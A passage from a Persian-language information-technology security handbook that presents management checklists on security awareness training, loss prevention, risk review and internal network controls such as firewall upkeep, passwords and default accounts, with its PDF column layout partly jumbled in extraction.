‫ﺍﻭﻝ ﻗــﺮﺍﺭ ﺩﺍﺭﺩ ﻭ ﻧﻔﻮﺫﻫــﺎﻱ ﺍﻣﻨﻴﺘــﻲ ﻋﻤــﺪﻱ ﻗﺎﺑــﻞ‬
‫ﭼﺸﻢﭘﻮﺷﻲ ﻧﻤﻲﺑﺎﺷﻨﺪ‪.‬‬
‫•‬
‫ﺁﻳﺎ ﻫﻤﺔ ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺍﻫﻤﻴﺖ ﮔﺰﺍﺭﺵ ﻭ‬
‫ﺣﻞ ﺳﺮﻳﻊ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺩﺭﻙ ﻣﻲﻛﻨﻨﺪ؟‬
‫•‬
‫ﺁﻳﺎ ﺍﺭﺗﻘﺎﻱ ﺳﻄﺢ ﺁﮔﺎﻫﻴﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺑﻌﻨـﻮﺍﻥ ﺑﺨـﺸﻲ ﺍﺯ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺳﺎﺯﻣﺎﻥ ﺑﺮﺍﻱ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺟﺪﻳﺪ ﻫﻤـﺔ ﺳـﻄﻮﺡ‬
‫ ﺍﺯ ﻛﺎﺭﻛﻨــﺎﻥ ﺧــﻂ ﺗﻮﻟﻴــﺪ ﮔﺮﻓﺘــﻪ ﺗــﺎ ﺳــﻄﻮﺡ ﺑــﺎﻻﻱ‬‫ﻣﺪﻳﺮﻳﺘﻲ ‪ -‬ﭘﺬﻳﺮﻓﺘﻪ ﺷﺪﻩ ﺍﺳﺖ؟‬
‫•‬
‫ﺁﻳﺎ ﺑﺮﺍﻱ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺁﮔﺎﻫﻲ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺗﻤﺎﻡ ﺭﺩﻩﻫﺎ ﻧﺴﺒﺖ‬
‫ﺑﻪ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﺷـﺮﻛﺖ ﮔﺎﻣﻬـﺎﻱ‬
‫ﻻﺯﻡ ﺑﺮﺩﺍﺷﺘﻪ ﺷﺪﻩ ﺍﺳﺖ؟‬
‫•‬
‫ﺁﻳــﺎ ﻫﻨﮕــﺎﻡ ﺗــﺪﻭﻳﻦ ﺳﻴﺎﺳــﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬــﺎﻱ ﺍﻣﻨﻴﺘــﻲ ﺑــﻪ‬
‫ﻭﺍﻗﻌﻴﺘﻬﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﻓﺮﻫﻨﮓ ﺷـﺮﻛﺖ )ﺭﻭﺍﺑـﻂ ﻣـﺪﻳﺮﺍﻥ ﻭ‬
‫ﻛﺎﺭﻣﻨﺪﺍﻥ( ﺗﻮﺟﻪ ﺷﺪﻩ ﺍﺳﺖ؟‬
‫•‬
‫ﺁﻳﺎ ﻛﺎﺭﻣﻨﺪﺍﻥ ﻣﻲﺩﺍﻧﻨﺪ ﻛﻪ ﻫﻨﮕﺎﻡ ﺑﺮﺧـﻮﺭﺩ ﺑـﺎ ﻣـﺸﻜﻼﺕ‬
‫ﺍﻣﻨﻴﺘﻲ )ﻳﺎ ﺩﺭ ﺟﺎﻳﻲ ﻛﻪ ﻧﺴﺒﺖ ﺑﻪ ﻭﻇﺎﻳﻒ ﺧﻮﺩ ﺁﮔﺎﻩ ﻧﻴﺴﺘﻨﺪ( ﺑﺎﻳﺪ‬
‫ﺍﺯ ﭼﻪ ﻛﺴﻲ ﻛﻤﻚ ﺑﺨﻮﺍﻫﻨﺪ؟‬
‫•‬
‫ﺁﻳﺎ ﺑﺎﺯﺑﻴﻨﻲ ﻭ ﻣﻤﻴﺰﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻄﻮﺭ ﻣﻨﻈﻢ ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ؟‬
‫ﻫﺮ ﺷﺶ ﻣﺎﻩ ﻳﻜﺒﺎﺭ؟ ﻫﺮ ﺳﺎﻝ ﻳﻜﺒﺎﺭ؟‬
‫ﻓﻬﺮﺳﺖ ﺯﻳﺮ ﺑﺎ ﻫﺪﻑ ﻛﻤﻚ ﺑﻪ ﻣﺪﻳﺮﺍﻥ ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺗﺎ ﺑﺘﻮﺍﻧﻨـﺪ‬
‫ﻛﺎﺭﻛﻨﺎﻥ ﺭﺍ ﺑﺮﺍﻱ ﻫﻤﻜﺎﺭﻱ ﺩﺭ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺳـﺎﺯﻣﺎﻥ ﺁﻣـﻮﺯﺵ‬
‫ﺩﻫﻨﺪ‪:‬‬
‫ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ﺁﻣﻮﺯﺷﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ‬
‫‪١٨٨‬‬
‫•‬
‫ﺁﻳﺎ ﻫﻤﺔ ﻣﺪﻳﺮﺍﻥ ﺭﺩﻩﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺑﻪ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺍﻣﻨﻴـﺖ‬
‫ﺳﺎﺯﻣﺎﻧﻲ ﻣﺘﻌﻬﺪ ﻫﺴﺘﻨﺪ؟‬
‫•‬
‫ﺁﻳﺎ ﺑﺎ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺟﻬﺖ ﺁﻣﻮﺯﺷـﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ‪ ،‬ﺍﺯ ﺍﻳـﻦ‬
‫ﺗﻌﻬﺪ ﺣﻤﺎﻳﺖ ﻛﺮﺩﻩﺍﻧﺪ؟‬
‫•‬
‫ﺁﻳﺎ ﺁﻥ ﺑﺮﻧﺎﻣـﺔ ﺁﻣﻮﺯﺷـﻲ ﺷـﺎﻣﻞ ﺟﺰﺋﻴـﺎﺕ ﭘﻴﻜﺮﺑﻨـﺪﻱ ﻭ‬
‫ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﻣﻨﻴﺖ ﻧﻴﺰ ﻣﻲﺑﺎﺷﺪ؟‬
‫•‬
‫ﺁﻳﺎ ﺑﺮﺍﻱ ﺁﻣﻮﺯﺵ ﺍﻣﻨﻴﺘﻲ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺗﻌﻴﻴﻦﺷﺪﻩﺍﻱ ﻭﺟﻮﺩ‬
‫ﺩﺍﺭﺩ؟‬
‫•‬
‫ﺁﻳﺎ ﺍﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ ﻛﺎﻣﻞ ﻭ ﺑﻪﺭﻭﺯ ﻫﺴﺘﻨﺪ ﻭ ﺁﻳﺎ ﻛﺎﺭﻛﻨـﺎﻥ ﺍﺯ‬
‫ﺁﻧﻬﺎ ﺍﻃﻼﻉ ﺩﺍﺭﻧﺪ؟‬
‫‪ ۱۸۸‬ﻣﻨﺒﻊ‪ ،ITS :‬ﻓﺼﻞ ﭘﻨﺠﻢ‪ ،‬ﺁﻣﻮﺯﺵ ﺍﻣﻨﻴﺖ‪ ،‬ﺹ ‪۸۱‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫•‬
‫ﺁﻳﺎ ﺧﻼﺻﻪ ﻫﺎﻱ ﻣﺪﻳﺮﻳﺘﻲ ﺑﻄﻮﺭ ﻣﻨﻈﻢ ﺗﻬﻴﻪ ﻣـﻲﺷـﻮﻧﺪ؟‬
‫ﻫﺮ ﭼﻨﺪ ﻭﻗﺖ ﻳﻜﺒﺎﺭ؟‬
‫•‬
‫ﺗﻮﺿﻴﺢ ﺩﻫﻨﺪ ﻛﻪ ﻋﻨﺎﺻﺮ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺍﻣﻨﻴﺘﻲ ﺧـﻮﺏ ﭼـﻪ‬
‫ﭼﻴﺰﻫﺎﻳﻲ ﻫﺴﺘﻨﺪ‪.‬‬
‫‪٢٠٠‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫•‬
‫ﺁﻳــﺎ ﻫﻤــﺔ ﻛﺎﺭﻣﻨــﺪﺍﻥ )ﺍﺯ ﺟﻤﻠــﻪ ﻣــﺪﻳﺮﺍﻥ ﺍﺟﺮﺍﻳــﻲ( ﺩﺭﺑــﺎﺭﺓ‬
‫ﻣـﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺧـﻮﺩ ﺩﺭ ﻗﺒـﺎﻝ ﺷـﺮﻛﺖ ﺁﻣـﻮﺯﺵ‬
‫ﺩﻳﺪﻩﺍﻧﺪ؟‬
‫•‬
‫ﺁﻳﺎ ﭼﺎﺭﭼﻮﺑﻲ ﺑﺮﺍﻱ ﺗﻮﺳﻌﻪ ﻭ ﺗﺪﺍﻭﻡ ﺁﮔﺎﻫﻲ ﺍﻣﻨﻴﺘﻲ ﻭﺟـﻮﺩ‬
‫ﺩﺍﺭﺩ؟‬
‫ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﺯﻳﺎﻥ‬
‫‪١٩٠‬‬
‫•‬
‫ﺁﻳﺎ ﺑﻪ ﺁﻧﭽﻪ ﻛﻪ ﺩﺭ ﺗﻼﺵ ﺑﺮﺍﻱ ﺣﻔﻆ ﺁﻥ ﻫﺴﺘﻴﺪ ﻭﺍﻗﻔﻴﺪ؟‬
‫•‬
‫ﺁﻳﺎ ﻣﺪﻳﺮﻳﺖ ﻧﻴﺰ ﺩﺭ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﺍﺕ ﺩﺧﻴﻞ ﺑﻮﺩﻩ ﺍﺳﺖ؟‬
‫•‬
‫ﺁﻳﺎ ﺳﻴﺎﺳﺘﻬﺎ ﺑﻪ ﻧﺜﺮ ﺭﻭﺍﻥ ﻧﻮﺷﺘﻪ ﺷﺪﻩﺍﻧﺪ ﻭ ﺑﺮﺍﺣﺘـﻲ ﻗﺎﺑـﻞ‬
‫ﺩﺭﻙ ﻫﺴﺘﻨﺪ؟‬
‫•‬
‫ﺩﺭ ﻓﺼﻠﻬﺎﻱ ﺩﻭﻡ‪ ،‬ﺳﻮﻡ‪ ،‬ﻭ ﭼﻬﺎﺭﻡ‪ ،‬ﺗﻬﺪﻳـﺪﻫﺎﻱ ﺭﺍﻳـﺞ ﺍﻣﻨﻴﺘـﻲ ﺭﺍ‬
‫ﺑﺮﺭﺳﻲ ﻛﺮﺩﻳﻢ )ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ( ﻭ ﺭﻭﺷﻬﺎﻱ ﺗﺤﻠﻴـﻞ ﺧـﺴﺎﺭﺗﻬﺎ ﺭﺍ‬
‫ﺷﺮﺡ ﺩﺍﺩﻳﻢ‪ ،‬ﻭ ﺩﺭ ﻓﺼﻠﻬﺎﻱ ﺑﻌﺪﻱ ﻧﻴﺰ ﺑﻪ ﺍﺭﺍﺋﻪ ﺭﺍﻫﺒﺮﺩﻫﺎﻳﻲ ﺑﺮﺍﻱ‬
‫ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ‪ -‬ﻛﻪ ﺑﻪ ﺗﻘﻮﻳﺖ ﺳـﺎﺯﻣﺎﻥ ﺩﺭ‬
‫ﻣﻘﺎﺑﻞ ﺣﻤﻼﺕ ﻭ ﺧﺴﺎﺭﺍﺕ ﺍﺗﻔﺎﻗﻲ ﻣﻨﺠﺮ ﻣﻲﺷﻮﻧﺪ ‪ -‬ﭘـﺮﺩﺍﺧﺘﻴﻢ‪.‬‬
‫ﭼﻨﺎﻧﻜﻪ ﺩﺭ ﺁﻥ ﻣﺒﺎﺣﺚ ﺩﻳﺪﻳﻢ‪ ،‬ﻃﺮﺡ ﻭﺍﻛﻨﺶ ﺷﺎﻣﻞ ﻓﻬﺮﺳـﺘﻲ ﺍﺯ‬
‫ﻧﺘﺎﻳﺞ ﺍﺭﺯﺷﻴﺎﺑﻲ ﻋﻤﻠﻲ ﺍﻣﻨﻴﺖ ﺩﺭ ﻣﻮﺭﺩ ﺩﺍﺭﺍﺋﻴﻬﺎ ﺍﺳﺖ ﻭ ﻃﻴﻔـﻲ ﺍﺯ‬
‫ﺍﻗﺪﺍﻣﺎﺕ ﺗﺪﺍﻓﻌﻲ ﺍﻭﻟﻴﻪ ﺭﺍ ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﺁﻳﺎ ﻫﻤﺔ ﺍﻓـﺮﺍﺩ ﺑـﻪ ﻳـﻚ ﻧـﺴﺨﻪ ﺍﺯ ﺳﻴﺎﺳـﺘﻬﺎ ﺩﺳﺘﺮﺳـﻲ‬
‫ﺩﺍﺭﻧﺪ؟‬
‫•‬
‫ﺁﻳﺎ ﻛﺴﻲ ﺷﺨﺼﹰﺎ ﺩﺭ ﺯﻣﻴﻨﺔ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬـﺎ ﻣـﺴﺌﻮﻟﻴﺖ‬
‫ﺻﺮﻳﺢ ﺩﺍﺭﺩ؟‬
‫•‬
‫ﺁﻳﺎ ﻛﺴﻲ ﻛﻪ ﻣﺴﺌﻮﻟﻴﺖ ﺳﻴﺎﺳـﺘﻬﺎ ﺑـﺮ ﻋﻬـﺪﺓ ﺍﻭﺳـﺖ ﺩﺭ‬
‫ﻛﻨﻔﺮﺍﻧﺴﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺷﺮﻛﺖ ﻣـﻲﻛﻨـﺪ ﻭ ﺩﺍﻧـﺶ ﺍﻣﻨﻴﺘـﻲ‬
‫ﺧﻮﺩ ﺭﺍ ﺑﻪﺭﻭﺯ ﻧﮕﻪ ﻣﻲﺩﺍﺭﺩ؟‬
‫•‬
‫ﻓﻬﺮﺳﺘﻬﺎﻱ ﻛﻨﺘﺮﻝ ﺯﻳﺮ ﺟﺰﺋﻴﺎﺕ ﺑﻴﺸﺘﺮﻱ ﺭﺍ ﺩﺭ ﺭﺍﺑﻄﻪ ﺑﺎ ﺍﺭﺯﻳـﺎﺑﻲ‬
‫ﻣﺨﺎﻃﺮﺍﺕ ﻭ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﺯﻳﺎﻥ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻨﺪ‪.‬‬
‫ﺁﻳﺎ ﺑﺼﻮﺭﺕ ﺩﻭﺭﻩﺍﻱ ﺑﻪ ﺑﺎﺯﺑﻴﻨﻲ ﻣﻲﭘﺮﺩﺍﺯﻳـﺪ ﺗـﺎ ﻣﻄﻤـﺌﻦ‬
‫ﺷﻮﻳﺪ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻫﻤﭽﻨﺎﻥ ﭘﺎﺑﺮﺟﺎ ﻫﺴﺘﻨﺪ؟‬
‫•‬
‫ﺁﻳﺎ ﻣﻄﻤﺌﻦ ﻫﺴﺘﻴﺪ ﺗﻤﺎﻡ ﺍﺷﺨﺎﺻﻲ ﻛﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷـﻤﺎ‬
‫ﺭﺍ ﻧﺼﺐ ﻣﻲﻛﻨﻨـﺪ ﻃﺒـﻖ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﻭ ﺭﻭﺍﻟﻬـﺎ ﺍﻣﻨﻴﺘـﻲ‬
‫ﺷﺮﻛﺖ ﺷﻤﺎ ﺁﻣﻮﺯﺵ ﺩﻳﺪﻩﺍﻧﺪ؟‬
‫•‬
‫ﺁﻳــﺎ ﭘــﻴﺶ ﺍﺯ ﺑﻜــﺎﺭﮔﻴﺮﻱ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﻧــﺮﻡﺍﻓــﺰﺍﺭﻱ ﻭ‬
‫ﻲ‬
‫ﺳﺨﺖﺍﻓﺰﺍﺭﻱ‪ ،‬ﺍﺯ ﺭﻓﻊ ﻭ ﺭﺟﻮﻉ ﺗﻤـﺎﻡ ﻣـﺸﻜﻼﺕ ﺍﻣﻨﻴﺘـ ﹺ‬
‫ﺷﻨﺎﺧﺘﻪﺷﺪﻩ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻣﻲﻛﻨﻴﺪ؟‬
‫•‬
‫ﺁﻳﺎ ﮔﺰﺍﺭﺷﻬﺎﻱ ﺑﺎﺯﺑﻴﻨﻲ ﺭﺍ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗـﺮﺍﺭ ﻣـﻲﺩﻫﻴـﺪ؟‬
‫ﻫﺮ ﭼﻨﺪ ﻭﻗﺖ ﻳﻜﺒﺎﺭ؟‬
‫ﭼﺎﺭﭼﻮﺏ ﻛﻨﺘﺮﻝ ﻭ ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﺍﺕ‬
‫ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ﺑﺎﺯﻧﮕﺮﻱ ﻣﺨﺎﻃﺮﺍﺕ‬
‫‪١٨٩‬‬
‫•‬
‫ﺁﻳﺎ ﺍﺧﻴﺮﹰﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﺍﺕ ﺻﻮﺭﺕ ﮔﺮﻓﺘـﻪ ﺍﺳـﺖ؟ ﺍﻳـﻦ‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﻫﺮ ﭼﻨﺪ ﻭﻗﺖ ﻳﻜﺒﺎﺭ ﺑﻪﺭﻭﺯ ﻣﻲﺷﻮﺩ؟‬
‫•‬
‫ﺁﻳﺎ ﺳﻴﺴﺘﻤﻬﺎ ﺑﺮ ﺣﺴﺐ ﺣﺴﺎﺳﻴﺖ ﻣﺨﺎﻃﺮﺍﺕ )ﻏﻴﺮﺣـﺴﺎﺱ‪،‬‬
‫ﺣﺴﺎﺱ‪ ،‬ﻭ ﺑﺴﻴﺎﺭ ﺣﺴﺎﺱ( ﺗﻘﺴﻴﻢﺑﻨﺪﻱ ﺷﺪﻩﺍﻧﺪ؟‬
‫•‬
‫ﺁﻳﺎ ﺍﻫﺪﺍﻑ ﻣﺪﻳﺮﻳﺘﻲ ﺑﺮ ﺍﺳﺎﺱ ﺍﺻﻮﻝ ﺍﻣﻨﻴﺘﻲ ﻫﺴﺘﻨﺪ؟‬
‫•‬
‫ﺁﻳﺎ ﺑﺮﺍﻱ ﺁﺯﻣﻮﺩﻥ ﻧﺘﺎﻳﺞ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨـﺎﻃﺮﺍﺕ‪ ،‬ﺑﺎﺯﺑﻴﻨﻴﻬـﺎﻱ‬
‫ﻣﻨﻈﻢ ﺍﻧﺠﺎﻡ ﻣﻲﮔﻴﺮﺩ؟‬
‫•‬
‫ﺁﻳﺎ ﻫﻨﮕﺎﻣﻴﻜﻪ ﻣﺨﺎﻃﺮﺍﺕ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﺍﺭﺯﻳﺎﺑﻲ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ﻭ‬
‫ﻛــﺎﻫﺶ ﺩﺍﺩﻩ ﺷــﻮﻧﺪ‪ ،‬ﺍﺯ ﻣﻤﻴﺰﻫــﺎﻱ ﺧــﺎﺭﺝ ﺍﺯ ﺳــﺎﺯﻣﺎﻥ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ؟‬
‫•‬
‫ﺁﻳﺎ ﺗﻤﺎﻡ ﻛﺎﺭﻣﻨـﺪﺍﻥ )ﺣﺘـﻲ ﻣـﺪﻳﺮﺍﻥ ﻭ ﺭﺍﻫﺒـﺮﺍﻥ ﺳﻴـﺴﺘﻢ( ﺑـﺮ‬
‫ﺍﺳﺎﺱ ﺍﻫﺪﺍﻑ ﺍﻣﻨﻴﺘـﻲ ﻣـﻮﺭﺩ ﺍﺭﺯﺷـﻴﺎﺑﻲ ﻗـﺮﺍﺭ ﮔﺮﻓﺘـﻪ ﻭ‬
‫ﻣﻨﺼﻮﺏ ﺷﺪﻩﺍﻧﺪ؟‬
‫‪ ۱۸۹‬ﻫﻤﺎﻥ ﻣﻨﺒﻊ‪ ،‬ﻓﺼﻞ ﺷﺸﻢ‪ ،‬ﺍﻣﻨﻴﺖ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻧﺸﺪﻩ‪ ،‬ﺹ ‪۹۵‬‬
‫ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ‪ :‬ﺷﺒﻜﻪﻫﺎﻱ ﺩﺍﺧﻠﻲ ﻭ ﺧﺎﺭﺟﻲ‬
‫ﻣﺒﺤــﺚ ﺍﻣﻨﻴــﺖ ﻓﻴﺰﻳﻜــﻲ ﺩﺭ ﺳــﻄﻮﺡ ﻣﺨﺘﻠﻔــﻲ ﺍﺯ ﺟﺰﺋﻴــﺎﺕ ﺩﺭ‬
‫ﺑﺨﺸﻬﺎﻱ ﺩﻭﻡ )ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ ﻛـﺎﺭﺑﺮﺍﻥ ﺍﻧﻔـﺮﺍﺩﻱ(‪ ،‬ﺳـﻮﻡ‬
‫)ﻫﻤﻴﻦ ﺑﺨﺶ( ﻭ ﭘﻨﺠﻢ )ﺍﻣﻨﻴـﺖ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ ﺭﺍﻫﺒـﺮﺍﻥ ﻭ ﻓﻨـﻲ(‬
‫ﭘﻮﺷﺶ ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺍﺯ ﺩﻳﺪﮔﺎﻩ ﻓﻨﻲ‪ ،‬ﺑﻌﻀﻲ ﺯﻣﻴﻨﻪﻫﺎ ﺑﺎﻳـﺪ ﺍﺯ‬
‫ﻣﻨﻈﺮ ﺍﻣﻨﻴﺘﻲ ﺗﺤﺖ ﭘﻮﺷﺶ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ؛ ﻣﺜﻞ ﺷﺒﻜﻪﻫﺎﻱ ﺩﺍﺧﻠﻲ‪،‬‬
‫ﺷﺒﻜﻪﻫﺎﻱ ﺧﺎﺭﺟﻲ‪ ،‬ﻭ ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺷﺒﻜﻪﻫﺎ‪ .‬ﻓﻬﺮﺳﺘﻬﺎﻱ‬
‫ﻛﻨﺘﺮﻝ ﺯﻳﺮ ﺟﻬﺖ ﻛﻤﻚ ﺑﻪ ﺣﻔﻆ ﻣﻨﺎﺑﻊ ﻓﻴﺰﻳﻜـﻲ ﻳـﻚ ﻣﺤـﻴﻂ‬
‫ﺷﺒﻜﻪﺍﻱ ﻃﺮﺍﺣﻲ ﺷﺪﻩﺍﻧﺪ‪.‬‬
‫‪ ۱۹۰‬ﻫﻤﺎﻥ ﻣﻨﺒﻊ‪ ،‬ﻓﺼﻞ ﺩﻭﻡ‪ ،‬ﺍﻣﻨﻴﺖ ﻣﺒﺘﻜﺮﺍﻧﻪ‪ ،‬ﺹ ‪۳۲‬‬
‫‪٢٠١‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﻓﻬﺮﺳﺖ ﺍﻣﻨﻴﺘﻲ ﺷﺒﻜﺔ ﺩﺍﺧﻠﻲ‬
‫‪١٩١‬‬
‫•‬
‫ﺁﻳﺎ ﻛﺴﻲ ﻣﺴﺌﻮﻟﻴﺖ ﺍﻧﺠﺎﻡ ﺁﺯﻣﻮﻥ ﻧﻔـﻮﺫ‪ ١٩٣‬ﺭﻭﻱ ﺩﻳـﻮﺍﺭﺓ‬
‫ﺁﺗﺶ ﺭﺍ ﺑﺮ ﻋﻬﺪﻩ ﺩﺍﺭﺩ؟‬
‫ﺁﻳﺎ ﻣﺸﺨﺺ ﺍﺳﺖ ﻛﻪ ﻣـﺴﺌﻮﻟﻴﺖ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﺩﻳـﻮﺍﺭﺓ‬
‫ﺁﺗﺶ )ﺩﺭﺻﻮﺭﺕ ﻟﺰﻭﻡ( ﺑﺮ ﻋﻬﺪﺓ ﻛﻴﺴﺖ؟‬
‫•‬
‫•‬
‫ﺁﻳﺎ ﺍﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎ ﺷﺎﻣﻞ ﻣﺠﻮﺯﻫﺎﻱ ﺩﺳﺘﺮﺳﻲ ﺑﻪ‬
‫ﻓﺎﻳﻠﻬﺎ‪ ،‬ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ‪ ،‬ﻭ ﻭﺻﻠﻪﻫﺎ ﻣﻲﺷﻮﻧﺪ؟‬
‫•‬
‫•‬
‫ﺁﻳﺎ ﺧﺪﻣﺎﺕ ﻏﻴﺮﺿﺮﻭﺭﻱ ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻛﺮﺩﻩﺍﻳﺪ؟‬
‫ﺁﻳﺎ ﺑﺮﺍﻱ ﺍﻣﻮﺭ ﺭﺍﻫﺒﺮﻱ‪ ،‬ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ‪ ،‬ﻭ ﻧﮕﻬﺪﺍﺭﻱ ﺩﻳـﻮﺍﺭﺓ‬
‫ﺁﺗﺶ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﻣﻨﺎﺳﺐ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﺍﺳﺖ؟‬
‫•‬
‫ﺁﻳﺎ ﺳﻴﺎﺳﺘﻲ ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؟‬
‫•‬
‫•‬
‫ﺁﻳﺎ ﻣﺪﻳﺮﺍﻥ ﺑـﻪ ﻧﻘـﺶ ﺧـﻮﺩ ﺩﺭ ﻓﺮﺁﻳﻨـﺪ ﺍﻣﻨﻴـﺖ ﻭ ﻧﻘـﺶ‬
‫ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺑﻪ ﺁﻧﻬﺎ ﮔﺰﺍﺭﺵ ﻣﻲﺩﻫﻨﺪ ﻭﺍﻗﻔﻨﺪ؟‬
‫ﺁﻳﺎ ﻫﻤﺔ ﻛﺎﺭﺑﺮﺍﻥ ﺭﻣﺰ ﻋﺒﻮﺭ ﺩﺍﺭﻧﺪ؟‬
‫•‬
‫•‬
‫ﺁﻳﺎ ﺣﺴﺎﺑﻬﺎﻱ ﭘﻴﺶﻓﺮﺽ ﻛﻪ ﺩﺭ ﺳﻴﺴﺘﻢ ﻣﻮﺟﻮﺩ ﻫـﺴﺘﻨﺪ‬
‫ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﺷﺪﻩﺍﻧﺪ؟‬
‫ﺁﻳﺎ ﻧﻘﺸﻬﺎ ﻭ ﻣـﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﻓـﻮﺭﻳﺘﻲ ﺑﻮﺿـﻮﺡ ﻭ ﺑـﺼﻮﺭﺕ‬
‫ﺭﺳﻤﻲ ﺗﻌﺮﻳﻒ ﺷﺪﻩﺍﻧﺪ؟‬
‫•‬
‫•‬
‫ﺁﻳﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﭘﻴﺶﻓـﺮﺽ "‪"Guest‬‬
‫ﻃﺒﻖ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﻣﻤﻨﻮﻉ ﺷﺪﻩ ﺍﺳﺖ؟‬
‫ﺁﻳﺎ ﻛﺎﺭﻛﻨـﺎﻥ ﺑﺨـﺶ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺭﻭﺍﻟﻬـﺎﻱ ﭘﻴـﺸﮕﻴﺮﺍﻧﺔ‬
‫ﻣﻌﻴﻨﻲ ﭘﻴﺮﻭﻱ ﻣﻲﻛﻨﻨﺪ؟‬
‫•‬
‫•‬
‫ﺁﻳﺎ ﺣﺴﺎﺑﻬﺎﻳﻲ ﻛﻪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻧﻤﻲﮔﻴﺮﻧﺪ ﺑـﺼﻮﺭﺕ‬
‫ﻣﻨﻈﻢ ﻏﻴﺮﻓﻌﺎﻝ ﻣﻲﺷﻮﻧﺪ؟‬
